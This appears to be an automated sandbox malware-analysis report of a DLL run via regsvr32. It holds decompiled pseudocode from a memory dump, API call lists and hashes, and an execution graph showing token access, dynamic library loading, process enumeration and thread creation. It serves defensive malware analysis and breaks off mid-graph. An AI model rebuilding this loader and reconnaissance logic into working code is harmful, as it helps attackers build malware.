            					 *(_t272 + 0x5c) = _t184;
            					_t81 = _t272 + 0x16b4; // 0x830a74c0
            					_t185 =  *_t81;
            					_t240 = _t239 - _t185;
            					_t241 =  <=  ? _t225 : _t240;
            					_t242 = ( <=  ? _t225 : _t240) + _t185;
            					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
            				}
            				if( *(_t272 + 0x16c0) < _t254) {
            					 *(_t272 + 0x16c0) = _t254;
            				}
            				if(_t269 == 0) {
            					_t218 = _a8;
            					__eflags = _t218;
            					if(_t218 == 0) {
            						L34:
            						_t89 = _t272 + 0x3c; // 0x830cc483
            						_t219 =  *_t272;
            						_t145 =  *_t89 - _t254 - 1;
            						_a4 =  *_t272;
            						_t234 = _t254;
            						_v16 = _t145;
            						_v8 = _t254;
            						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
            						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
            							_v8 = _t254;
            							_t95 = _t272 + 0x5c; // 0xee85000
            							_a4 = _t219;
            							_t234 = _t254;
            							_t97 = _t272 + 0x2c; // 0x8df075ff
            							__eflags =  *_t95 -  *_t97;
            							if( *_t95 >=  *_t97) {
            								_t98 = _t272 + 0x2c; // 0x8df075ff
            								_t167 =  *_t98;
            								_t259 = _t254 - _t167;
            								_t99 = _t272 + 0x38; // 0xf47d8bff
            								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
            								 *(_t272 + 0x6c) = _t259;
            								memcpy( *_t99, _t167 +  *_t99, _t259);
            								_t103 = _t272 + 0x16b0; // 0x8508458b
            								_t170 =  *_t103;
            								_t273 = _t273 + 0xc;
            								__eflags = _t170 - 2;
            								if(_t170 < 2) {
            									_t172 = _t170 + 1;
            									__eflags = _t172;
            									 *(_t272 + 0x16b0) = _t172;
            								}
            								_t106 = _t272 + 0x2c; // 0x8df075ff
            								_t145 = _v16 +  *_t106;
            								__eflags = _t145;
            								_a4 =  *_t272;
            								_t108 = _t272 + 0x6c; // 0x51ec8b55
            								_t234 =  *_t108;
            								_v8 = _t234;
            							}
            						}
            						_t255 = _a4;
            						_t220 =  *((intOrPtr*)(_a4 + 4));
            						__eflags = _t145 - _t220;
            						_t221 =  <=  ? _t145 : _t220;
            						_t146 = _t221;
            						_a4 = _t221;
            						_t222 = _a8;
            						__eflags = _t146;
            						if(_t146 != 0) {
            							_t114 = _t272 + 0x38; // 0xf47d8bff
            							E03176020(_t255,  *_t114 + _v8, _t146);
            							_t273 = _t273 + 0xc;
            							_t117 = _t272 + 0x6c;
            							 *_t117 =  *(_t272 + 0x6c) + _a4;
            							__eflags =  *_t117;
            							_t119 = _t272 + 0x6c; // 0x51ec8b55
            							_t234 =  *_t119;
            						}
            						__eflags =  *(_t272 + 0x16c0) - _t234;
            						if( *(_t272 + 0x16c0) < _t234) {
            							 *(_t272 + 0x16c0) = _t234;
            						}
            						_t122 = _t272 + 0x16bc; // 0x5d08408b
            						_t123 = _t272 + 0xc; // 0x452bf84d
            						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
            						__eflags = _t257 - 0xffff;
            						_t258 =  >  ? 0xffff : _t257;
            						_t124 = _t272 + 0x2c; // 0x8df075ff
            						_t151 =  *_t124;
            						_t125 = _t272 + 0x5c; // 0xee85000
            						_t235 = _t234 -  *_t125;
            						__eflags = _t258 - _t151;
            						_t152 =  <=  ? _t258 : _t151;
            						__eflags = _t235 - ( <=  ? _t258 : _t151);
            						if(_t235 >= ( <=  ? _t258 : _t151)) {
            							L49:
            							__eflags = _t235 - _t258;
            							_t154 =  >  ? _t258 : _t235;
            							_a4 =  >  ? _t258 : _t235;
            							__eflags = _t222 - 4;
            							if(_t222 != 4) {
            								L53:
            								_t269 = 0;
            								__eflags = 0;
            							} else {
            								_t161 =  *_t272;
            								__eflags =  *(_t161 + 4);
            								_t154 = _a4;
            								if( *(_t161 + 4) != 0) {
            									goto L53;
            								} else {
            									__eflags = _t154 - _t235;
            									if(_t154 != _t235) {
            										goto L53;
            									} else {
            										_t269 = _t222 - 3;
            									}
            								}
            							}
            							_t131 = _t272 + 0x38; // 0xf47d8bff
            							_t132 = _t272 + 0x5c; // 0xee85000
            							E03177180(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
            							_t134 = _t272 + 0x5c;
            							 *_t134 =  *(_t272 + 0x5c) + _a4;
            							__eflags =  *_t134;
            							E03175EE0( *_t134,  *_t272);
            						} else {
            							__eflags = _t235;
            							if(_t235 != 0) {
            								L46:
            								__eflags = _t222;
            								if(_t222 != 0) {
            									_t162 =  *_t272;
            									__eflags =  *(_t162 + 4);
            									if( *(_t162 + 4) == 0) {
            										__eflags = _t235 - _t258;
            										if(_t235 <= _t258) {
            											goto L49;
            										}
            									}
            								}
            							} else {
            								__eflags = _t222 - 4;
            								if(_t222 == 4) {
            									goto L46;
            								}
            							}
            						}
            						asm("sbb edi, edi");
            						_t271 =  ~_t269 & 0x00000002;
            						__eflags = _t271;
            						return _t271;
            					} else {
            						__eflags = _t218 - 4;
            						if(_t218 == 4) {
            							goto L34;
            						} else {
            							_t173 =  *_t272;
            							__eflags =  *(_t173 + 4);
            							if( *(_t173 + 4) != 0) {
            								goto L34;
            							} else {
            								_t88 = _t272 + 0x5c; // 0xee85000
            								__eflags = _t254 -  *_t88;
            								if(_t254 !=  *_t88) {
            									goto L34;
            								} else {
            									return 1;
            								}
            							}
            						}
            					}
            				} else {
            					return 3;
            				}
            			}
            0x031744f4
            0x03174397
            0x03174397
            0x0317439a
            0x00000000
            0x0317439c
            0x0317439c
            0x0317439e
            0x031743a2
            0x00000000
            0x031743a4
            0x031743a4
            0x031743a4
            0x031743a7
            0x00000000
            0x031743ab
            0x031743b4
            0x031743b4
            0x031743a7
            0x031743a2
            0x0317439a
            0x03174386
            0x0317438f
            0x0317438f

            APIs
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: memcpy
            • String ID:
            • API String ID: 3510742995-0
            • Opcode ID: 03b0abeb86da1b833a58bdc3ae0fa7b72a6af37fe1020f7e2813aec2e01359af
            • Instruction ID: 035755980a380ad09e7446e3804e4b9f003d7d69752c7ab610afd9144e1ae051
            • Opcode Fuzzy Hash: 03b0abeb86da1b833a58bdc3ae0fa7b72a6af37fe1020f7e2813aec2e01359af
            • Instruction Fuzzy Hash: FBD1F275A007009FCB24CF6ED8D496AB7F5BF88304B28896DE88ACB751DB31E945CB54
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0316C92F(void* __ecx) {
            				void* _v8;
            				void* _t10;
            				intOrPtr _t13;
            
            				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
            					L4:
            					_t10 = _v8;
            				} else {
            					if(GetLastError() != 0x3f0) {
            						L3:
            						_t10 = 0;
            					} else {
            						_t13 =  *0x317f8d0; // 0x4faf8c0
            						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x12c))(), 8,  &_v8) != 0) {
            							goto L4;
            						} else {
            							goto L3;
            						}
            					}
            				}
            				return _t10;
            			}


            0x0316c94e
            0x0316c980
            0x0316c980
            0x0316c950
            0x0316c95b
            0x0316c97c
            0x0316c97c
            0x0316c95d
            0x0316c967
            0x0316c97a
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0316c97a
            0x0316c95b
            0x0316c985

            APIs
            • GetCurrentThread.KERNEL32 ref: 0316C942
            • OpenThreadToken.ADVAPI32(00000000,?,?,0316CA74,00000000,03160000), ref: 0316C949
            • GetLastError.KERNEL32(?,?,0316CA74,00000000,03160000), ref: 0316C950
            • OpenProcessToken.ADVAPI32(00000000,?,?,0316CA74,00000000,03160000), ref: 0316C975
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: OpenThreadToken$CurrentErrorLastProcess
            • String ID:
            • API String ID: 1515895013-0
            • Opcode ID: b44456d126d22df2ae10ccfc255201831021373ec9cb0f5bed033035d25cbca3
            • Instruction ID: 11f16a38663d8e5f50e30e1ef7bda8dab1350d1f9c33b6b6edbd3df87cc43752
            • Opcode Fuzzy Hash: b44456d126d22df2ae10ccfc255201831021373ec9cb0f5bed033035d25cbca3
            • Instruction Fuzzy Hash: A4F01732A01205EBDB04ABF49809BAA73FCFB0C300F090490E682D3094D760E9958BA0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 89%
            			E0316D309(void* __ebx, void* __edx, void* __edi, void* __esi) {
            				char _v8;
            				char _v12;
            				char _v140;
            				signed char _t14;
            				char _t15;
            				intOrPtr _t20;
            				void* _t25;
            				intOrPtr _t26;
            				intOrPtr _t32;
            				WCHAR* _t34;
            				intOrPtr _t35;
            				struct HINSTANCE__* _t37;
            				intOrPtr _t38;
            				intOrPtr _t46;
            				void* _t47;
            				intOrPtr _t50;
            				void* _t60;
            				void* _t61;
            				char _t62;
            				void* _t65;
            				intOrPtr _t66;
            				char _t68;
            
            				_t65 = __esi;
            				_t61 = __edi;
            				_t47 = __ebx;
            				_t50 =  *0x317f8d4; // 0x4fafc00
            				_t1 = _t50 + 0x1898; // 0x0
            				_t14 =  *_t1;
            				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
            					_t15 = E03169F85(_t50, 0xb9d);
            					_t66 =  *0x317f8d4; // 0x4fafc00
            					_t62 = _t15;
            					_t67 = _t66 + 0xb0;
            					_v8 = _t62;
            					E03169FE4( &_v140, 0x40, L"%08x", E0316E34A(_t66 + 0xb0, E0316A5D0(_t66 + 0xb0), 0));
            					_t20 =  *0x317f8d4; // 0x4fafc00
            					_t7 = _t20 + 0xa8; // 0x1
            					asm("sbb eax, eax");
            					_t25 = E03169F85(_t67, ( ~( *_t7) & 0xfffffeb6) + 0xded);
            					_t26 =  *0x317f8d4; // 0x4fafc00
            					_t68 = E03169C50(_t26 + 0x1020);
            					_v12 = _t68;
            					E03168D9A( &_v8);
            					_t32 =  *0x317f8d4; // 0x4fafc00
            					_t34 = E03169C50(_t32 + 0x122a);
            					 *0x317f9d4 = _t34;
            					_t35 =  *0x317f8d0; // 0x4faf8c0
            					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x317c9d8,  &_v140, ".", L"dll", 0, 0x317c9d8, _t25, 0x317c9d8, _t62, 0, _t61, _t65, _t47);
            					_t37 = LoadLibraryW( *0x317f9d4);
            					 *0x317f9cc = _t37;
            					if(_t37 == 0) {
            						_t38 = 0;
            					} else {
            						_push(_t37);
            						_t60 = 0x28;
            						_t38 = E0316F08E(0x317cbc4, _t60);
            					}
            					 *0x317f9d0 = _t38;
            					E03168DDF( &_v12, 0xfffffffe);
            					E03168F63( &_v140, 0, 0x80);
            					if( *0x317f9d0 != 0) {
            						goto L10;
            					} else {
            						E03168DDF(0x317f9d4, 0xfffffffe);
            						goto L8;
            					}
            				} else {
            					L8:
            					if( *0x317f9d0 == 0) {
            						_t46 =  *0x317f908; // 0x4fafa00
            						 *0x317f9d0 = _t46;
            					}
            					L10:
            					return 1;
            				}
            			}


            0x0316d309
            0x0316d309
            0x0316d309
            0x0316d30c
            0x0316d318
            0x0316d318
            0x0316d323
            0x0316d33f
            0x0316d344
            0x0316d34d
            0x0316d34f
            0x0316d357
            0x0316d378
            0x0316d37d
            0x0316d382
            0x0316d38a
            0x0316d397
            0x0316d3a5
            0x0316d3b6
            0x0316d3bc
            0x0316d3bf
            0x0316d3d6
            0x0316d3e2
            0x0316d3ea
            0x0316d3f1
            0x0316d3f7
            0x0316d403
            0x0316d409
            0x0316d410
            0x0316d423
            0x0316d412
            0x0316d412
            0x0316d415
            0x0316d41b
            0x0316d420
            0x0316d425
            0x0316d430
            0x0316d442
            0x0316d454
            0x00000000
            0x0316d456
            0x0316d45d
            0x00000000
            0x0316d463
            0x0316d464
            0x0316d464
            0x0316d46b
            0x0316d46d
            0x0316d472
            0x0316d472
            0x0316d477
            0x0316d47b
            0x0316d47b

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID: %08x$dll
            • API String ID: 1029625771-2963171978
            • Opcode ID: 27d49138d3ea75184538cf973bd1621f0dadada68fb2bfae8f3858b7cbefb43e
            • Instruction ID: d601b9fd65cb9b80c179cb5823fa17083439b63ca64a8c85fc0cec3005f22ada
            • Opcode Fuzzy Hash: 27d49138d3ea75184538cf973bd1621f0dadada68fb2bfae8f3858b7cbefb43e
            • Instruction Fuzzy Hash: 683170B6A04204BFDB14EBA8EC45FAB76BCEB4D714F1C41A6F105EB184DB3499E18760
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 47%
            			E031736D5(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
            				char _v5;
            				long long _v12;
            				short _v20;
            				signed int _t15;
            				void* _t16;
            				signed int _t22;
            				char _t25;
            				void* _t26;
            				signed int _t28;
            				intOrPtr _t29;
            				void* _t31;
            				char** _t32;
            				long long _t40;
            				long long _t41;
            
            				_t40 = __fp0;
            				_t15 = E031735EE(_a4);
            				 *_t32 = "msxml32.dll";
            				_t28 = _t15 & 0x0fffffff;
            				_t16 = E0316A5D0();
            				_t26 = 0xf;
            				_t25 = 0;
            				_v5 = 0;
            				if(_t16 > _t26) {
            					L2:
            					_t3 = _t25 + 0x41; // 0x41
            					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
            					_t25 = _t25 + 1;
            				} else {
            					_t26 = _t16;
            					if(_t26 != 0) {
            						do {
            							goto L2;
            						} while (_t25 < _t26);
            					}
            				}
            				lstrlenW( &_v20);
            				_t29 = _a8;
            				_t22 = _a12 - _t29 + 1;
            				_a12 = _t22;
            				asm("fild dword [ebp+0x10]");
            				if(_t22 < 0) {
            					_t40 = _t40 +  *0x317cf90;
            				}
            				_a12 = _t28;
            				_v12 = _t40;
            				_t41 = _v12;
            				asm("fild dword [ebp+0x10]");
            				if(_t28 < 0) {
            					_t41 = _t41 +  *0x317cf90;
            				}
            				_v12 = _t41;
            				asm("fmulp st1, st0");
            				L03178995();
            				return _t29 - _t22;
            			}


            0x031736d5
            0x031736e0
            0x031736e7
            0x031736ee
            0x031736f4
            0x031736fc
            0x031736fd
            0x031736ff
            0x03173704
            0x0317370c
            0x0317370c
            0x0317370f
            0x03173713
            0x03173706
            0x03173706
            0x0317370a
            0x0317370c
            0x00000000
            0x00000000
            0x0317370c
            0x0317370a
            0x0317371c
            0x03173725
            0x0317372a
            0x0317372d
            0x03173730
            0x03173733
            0x03173735
            0x03173735
            0x0317373b
            0x0317373e
            0x03173741
            0x03173744
            0x03173749
            0x0317374b
            0x0317374b
            0x03173751
            0x0317375d
            0x0317375f
            0x0317376b

            APIs
            • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 0317371C
            • _ftol2_sse.MSVCRT ref: 0317375F
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: _ftol2_sselstrlen
            • String ID: msxml32.dll
            • API String ID: 1292649733-2051705522
            • Opcode ID: 5a6dba824ba9d71284d691d83037f5d7e1071b6e5551da38815aa5b0ef67dd5e
            • Instruction ID: 64b78aaa53612f619d6b3ecd63e36efc3d345e629a4d756497aa9ca72a0baf3c
            • Opcode Fuzzy Hash: 5a6dba824ba9d71284d691d83037f5d7e1071b6e5551da38815aa5b0ef67dd5e
            • Instruction Fuzzy Hash: AC11C27AA00249ABCF04EF69E8044DE7FB5FF8C310F2E4999D864D6249EB30C1659795
            Uniqueness

            Uniqueness Score: -1.00%

            Execution Graph

            Execution Coverage:6.1%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:0%
            Total number of Nodes:2000
            Total number of Limit Nodes:52
            execution_graph 13945 34657c3 13964 3469eab 13945->13964 13948 34658c4 13950 34657f2 13950->13948 13951 3469f6b 2 API calls 13950->13951 13952 346580a 13951->13952 13953 3469fa5 2 API calls 13952->13953 13954 346581f 13953->13954 13955 3468d87 2 API calls 13954->13955 13956 3465827 13955->13956 13957 3468ddf 2 API calls 13956->13957 13958 3465842 13957->13958 13959 346b787 2 API calls 13958->13959 13961 3465850 13959->13961 13960 346c402 11 API calls 13960->13961 13961->13960 13962 34658b9 13961->13962 13963 3468ddf 2 API calls 13962->13963 13963->13948 13965 34698e9 2 API calls 13964->13965 13966 3469ecc 13965->13966 13967 3469c50 2 API calls 13966->13967 13968 34657db 13967->13968 13968->13948 13969 3468dc9 RtlAllocateHeap 13968->13969 13969->13950 13984 346fbd6 13987 3468dc9 RtlAllocateHeap 13984->13987 13986 346fbe6 13987->13986 13137 346225e 13138 34698e9 2 API calls 13137->13138 13139 3462295 13138->13139 13140 346bfc8 2 API calls 13139->13140 13141 34622ad 13140->13141 13142 34622b4 13141->13142 13159 346c4d1 memset 13141->13159 13144 3468ddf 2 API calls 13142->13144 13152 34623fe 13144->13152 13145 3462425 13146 3469e22 2 API calls 13145->13146 13149 3462432 13146->13149 13147 346241a 13151 3468ddf 2 API calls 13147->13151 13148 3469f85 2 API calls 13158 34622c4 13148->13158 13150 3468ddf 2 API calls 13150->13152 13151->13145 13152->13145 13152->13147 13152->13150 13153 3468ddf HeapFree memset 13153->13158 13154 346109a 2 API calls 13154->13158 13155 3469c50 RtlAllocateHeap lstrcatW 13155->13158 13156 3468d9a HeapFree memset 13156->13158 13157 346b787 memset GetExitCodeProcess 13157->13158 13158->13142 13158->13148 13158->13153 13158->13154 13158->13155 13158->13156 13158->13157 13174 3468dc9 RtlAllocateHeap 13159->13174 13161 346c4f8 13162 3469ab3 RtlAllocateHeap 13161->13162 13173 346c57c 13161->13173 13163 346c516 13162->13163 13164 3469ab3 RtlAllocateHeap 13163->13164 13165 346c529 13164->13165 13166 3469ab3 RtlAllocateHeap 13165->13166 
13167 346c53d 13166->13167 13168 3469f85 2 API calls 13167->13168 13169 346c54a 13168->13169 13170 3468d9a 2 API calls 13169->13170 13171 346c570 13170->13171 13172 3469ab3 RtlAllocateHeap 13171->13172 13172->13173 13173->13158 13174->13161 13249 346286e 13250 3462964 13249->13250 13251 3462885 13249->13251 13253 3469e22 2 API calls 13250->13253 13252 346bfc8 2 API calls 13251->13252 13255 3462891 13252->13255 13254 3462970 13253->13254 13255->13250 13279 3469f14 13255->13279 13258 3468ddf 2 API calls 13258->13250 13259 3469b26 2 API calls 13260 34628b5 13259->13260 13283 346bf56 13260->13283 13262 34628c8 13263 3469b26 2 API calls 13262->13263 13275 346293d 13262->13275 13265 34628d4 13263->13265 13264 3468ddf 2 API calls 13266 346294b 13264->13266 13267 346109a 2 API calls 13265->13267 13268 3468ddf 2 API calls 13266->13268 13269 34628e0 13267->13269 13270 3462956 13268->13270 13271 3469c50 2 API calls 13269->13271 13270->13258 13272 34628f1 13271->13272 13273 3468d9a 2 API calls 13272->13273 13274 34628ff 13273->13274 13274->13275 13276 346b787 2 API calls 13274->13276 13275->13264 13277 346291d 13276->13277 13278 3468ddf 2 API calls 13277->13278 13278->13275 13280 3469f1d 13279->13280 13282 34628a3 13279->13282 13286 3468dc9 RtlAllocateHeap 13280->13286 13282->13259 13282->13270 13287 3468dc9 RtlAllocateHeap 13283->13287 13285 346bf7b 13285->13262 13286->13282 13287->13285 11200 3466603 11201 3466611 11200->11201 11206 3466669 11200->11206 11229 3468db4 HeapCreate 11201->11229 11203 3466616 11230 3469787 11203->11230 11213 3466664 11216 3468d9a 2 API calls 11213->11216 11214 346666e 11250 3468d9a 11214->11250 11216->11206 11222 34666c5 CreateThread 11222->11206 11330 34663a2 11222->11330 11223 346f0d9 8 API calls 11224 34666a0 11223->11224 11263 346647a memset 11224->11263 11229->11203 11282 3468dc9 RtlAllocateHeap 11230->11282 11232 346661b 11233 3473d36 11232->11233 11234 3473d6b 11233->11234 11283 3468e2e 11234->11283 11236 3466629 11237 346f0d9 11236->11237 
11287 3469f6b 11237->11287 11240 346f103 LoadLibraryA 11242 346f10a 11240->11242 11241 346f0fb GetModuleHandleA 11241->11242 11243 346f118 11242->11243 11290 346f08e 11242->11290 11295 3468d87 11243->11295 11247 3469f85 11313 3468ca3 11247->11313 11249 3466650 GetFileAttributesW 11249->11213 11249->11214 11251 3466673 11250->11251 11252 3468da8 11250->11252 11254 346109a 11251->11254 11253 3468ddf 2 API calls 11252->11253 11253->11251 11255 3468ca3 2 API calls 11254->11255 11256 34610b5 11255->11256 11257 346fcda 11256->11257 11258 346fcf6 11257->11258 11259 3466687 11258->11259 11319 3468dc9 RtlAllocateHeap 11258->11319 11259->11222 11259->11223 11261 346fd09 11261->11259 11262 3468ddf 2 API calls 11261->11262 11262->11259 11320 3461080 11263->11320 11265 34664a6 11266 34664b7 11265->11266 11267 34664f8 11265->11267 11268 3461080 2 API calls 11266->11268 11269 3461080 2 API calls 11267->11269 11270 34664c1 11268->11270 11271 3466502 11269->11271 11323 3469fa5 11270->11323 11275 3468d87 2 API calls 11271->11275 11273 34664d7 11274 3468d87 2 API calls 11273->11274 11276 34664e2 11274->11276 11275->11276 11277 3468ddf 11276->11277 11278 34666b5 11277->11278 11280 3468de9 11277->11280 11278->11222 11279 3468f63 memset 11281 3468e19 HeapFree 11279->11281 11280->11278 11280->11279 11281->11278 11282->11232 11286 3468dc9 RtlAllocateHeap 11283->11286 11285 3468e3f 11285->11236 11286->11285 11299 3468bcd 11287->11299 11306 3468dc9 RtlAllocateHeap 11290->11306 11292 346f0a0 11294 346f0cf 11292->11294 11307 346ef38 11292->11307 11294->11243 11296 3468d8f 11295->11296 11297 346663f 11295->11297 11298 3468ddf 2 API calls 11296->11298 11297->11247 11298->11297 11301 3468be4 11299->11301 11304 3468c05 11299->11304 11300 3468c4c lstrlenW 11302 3468c58 11300->11302 11301->11304 11305 3468dc9 RtlAllocateHeap 11301->11305 11302->11240 11302->11241 11304->11300 11304->11302 11305->11304 11306->11292 11308 346efac 11307->11308 11309 346ef51 11307->11309 11308->11292 11309->11308 11310 
346f004 LoadLibraryA 11309->11310 11310->11308 11311 346f012 GetProcAddress 11310->11311 11311->11308 11312 346f01e 11311->11312 11312->11308 11315 3468cc4 lstrlenW 11313->11315 11318 3468dc9 RtlAllocateHeap 11315->11318 11317 3468d4b 11317->11249 11317->11317 11318->11317 11319->11261 11321 3468bcd 2 API calls 11320->11321 11322 3461096 11321->11322 11322->11265 11327 3468f63 11323->11327 11326 3469fd3 11326->11273 11328 3468f6c memset 11327->11328 11329 3468f7d _vsnprintf 11327->11329 11328->11329 11329->11326 11342 346651e 11330->11342 11334 34663b3 11336 34663ed 11334->11336 11341 34663bd 11334->11341 11405 346d889 11334->11405 11337 3466424 11336->11337 11338 346641d 11336->11338 11337->11341 11445 3463597 11337->11445 11421 34661e8 11338->11421 11343 346f0d9 8 API calls 11342->11343 11344 3466532 11343->11344 11345 346f0d9 8 API calls 11344->11345 11346 346654b 11345->11346 11347 346f0d9 8 API calls 11346->11347 11348 3466564 11347->11348 11349 346f0d9 8 API calls 11348->11349 11350 346657d 11349->11350 11351 346f0d9 8 API calls 11350->11351 11352 3466598 11351->11352 11353 346f0d9 8 API calls 11352->11353 11354 34665b1 11353->11354 11355 346f0d9 8 API calls 11354->11355 11356 34665ca 11355->11356 11357 346f0d9 8 API calls 11356->11357 11358 34665e3 11357->11358 11359 346f0d9 8 API calls 11358->11359 11360 34663a7 GetOEMCP 11359->11360 11361 346dfc2 11360->11361 11452 3468dc9 RtlAllocateHeap 11361->11452 11363 346dfdd 11364 346dfe8 GetCurrentProcessId 11363->11364 11404 346e33d 11363->11404 11365 346e000 11364->11365 11453 346ca0a 11365->11453 11367 346e064 11469 346f3a0 11367->11469 11368 346e053 11368->11367 11460 346ca5a 11368->11460 11373 346e099 11374 346e0e3 GetLastError 11373->11374 11375 346e0e9 GetSystemMetrics 11373->11375 11374->11375 11376 346e110 11375->11376 11478 346c85a 11376->11478 11382 346e14b 11495 346c870 11382->11495 11387 3468f63 memset 11388 346e1a2 GetVersionExA 11387->11388 11514 346ddbe 11388->11514 11392 346e1c0 
GetWindowsDirectoryW 11393 3469f85 2 API calls 11392->11393 11394 346e1e3 11393->11394 11395 3468d9a 2 API calls 11394->11395 11396 346e21d 11395->11396 11398 346e255 11396->11398 11537 3469fe4 11396->11537 11520 347357b 11398->11520 11404->11334 11615 346d7cd 11405->11615 11408 346d9d5 11408->11336 11410 346d9ca 11412 3468ddf 2 API calls 11410->11412 11411 346d9b8 11411->11410 11413 3468ddf 2 API calls 11411->11413 11412->11408 11413->11411 11414 3468f63 memset 11420 346d8c6 11414->11420 11417 346d939 GetLastError 11645 346dadc ResumeThread 11417->11645 11419 346d963 FindCloseChangeNotification 11419->11420 11420->11410 11420->11411 11420->11414 11420->11417 11420->11419 11627 346be10 11420->11627 11632 346d9de 11420->11632 11715 346a79b 11421->11715 11424 34661f7 11424->11341 11425 346620f 11731 346601d 11425->11731 11431 3466272 11766 34660d9 11431->11766 11432 3466223 11434 3466277 11432->11434 11438 3466228 11432->11438 11435 3466293 11434->11435 11444 3466270 11434->11444 11779 3470ac8 11434->11779 11435->11341 11438->11435 11439 346b6e3 7 API calls 11438->11439 11440 3466248 11439->11440 11743 3465c8c 11440->11743 11800 34660bf 11444->11800 12963 3468dc9 RtlAllocateHeap 11445->12963 11447 346359e 11451 34635d5 11447->11451 12964 3468dc9 RtlAllocateHeap 11447->12964 11449 34635af 11450 34698d0 2 API calls 11449->11450 11449->11451 11450->11451 11451->11341 11452->11363 11454 346ca21 11453->11454 11455 346ca25 11454->11455 11541 346c9f3 11454->11541 11455->11368 11458 346ca4a FindCloseChangeNotification 11459 346ca36 11458->11459 11459->11368 11554 346c92f GetCurrentThread OpenThreadToken 11460->11554 11463 346cb10 11463->11367 11464 346c986 6 API calls 11468 346ca8e FindCloseChangeNotification 11464->11468 11466 346cb06 11467 3468ddf 2 API calls 11466->11467 11467->11463 11468->11463 11468->11466 11471 346f3bf 11469->11471 11470 346e08e 11473 346f365 11470->11473 11471->11470 11559 3469ab3 11471->11559 11474 346f37c 11473->11474 11475 346f39c 11474->11475 
11476 3469ab3 RtlAllocateHeap 11474->11476 11475->11373 11477 346f389 11476->11477 11477->11373 11564 346c778 11478->11564 11480 346c86e 11481 346c64d 11480->11481 11482 346c668 11481->11482 11483 3469f6b 2 API calls 11482->11483 11484 346c672 11483->11484 11579 34736d5 11484->11579 11486 346c6bd 11487 3468d87 2 API calls 11486->11487 11488 346c6c9 11487->11488 11491 3469bd5 11488->11491 11489 346c687 11489->11486 11490 34736d5 2 API calls 11489->11490 11490->11489 11492 3469be1 MultiByteToWideChar 11491->11492 11493 3469bdc 11491->11493 11494 3469bf5 11492->11494 11493->11382 11494->11382 11496 3469f6b 2 API calls 11495->11496 11497 346c88b 11496->11497 11498 3469f6b 2 API calls 11497->11498 11500 346c89a 11498->11500 11499 346c92a 11508 346cbd7 11499->11508 11500->11499 11501 34736d5 2 API calls 11500->11501 11502 346c8eb 11500->11502 11501->11500 11503 34736d5 2 API calls 11502->11503 11504 346c916 11502->11504 11503->11502 11505 3468d87 2 API calls 11504->11505 11506 346c922 11505->11506 11507 3468d87 2 API calls 11506->11507 11507->11499 11509 346cbef 11508->11509 11510 346c986 6 API calls 11509->11510 11511 346cbf3 11509->11511 11512 346cc07 11510->11512 11511->11387 11512->11511 11513 3468ddf 2 API calls 11512->11513 11513->11511 11515 346dde4 11514->11515 11516 346ddd3 GetCurrentProcess IsWow64Process 11514->11516 11517 346dde7 11515->11517 11516->11515 11518 346ddf6 GetSystemInfo 11517->11518 11519 346ddf1 11517->11519 11518->11392 11519->11392 11521 346e31e 11520->11521 11522 3473586 11520->11522 11524 34698d0 11521->11524 11522->11521 11523 34736d5 2 API calls 11522->11523 11523->11522 11584 3469858 11524->11584 11527 346db68 11528 346dd4d 11527->11528 11529 3469f6b 2 API calls 11528->11529 11531 346dd7d 11528->11531 11533 3468d87 2 API calls 11528->11533 11598 3469d29 11528->11598 11529->11528 11590 346baf6 CreateToolhelp32Snapshot 11531->11590 11533->11528 11534 346dd99 11536 346ddb6 11534->11536 11604 3469e22 11534->11604 11536->11404 11538 3468f63 
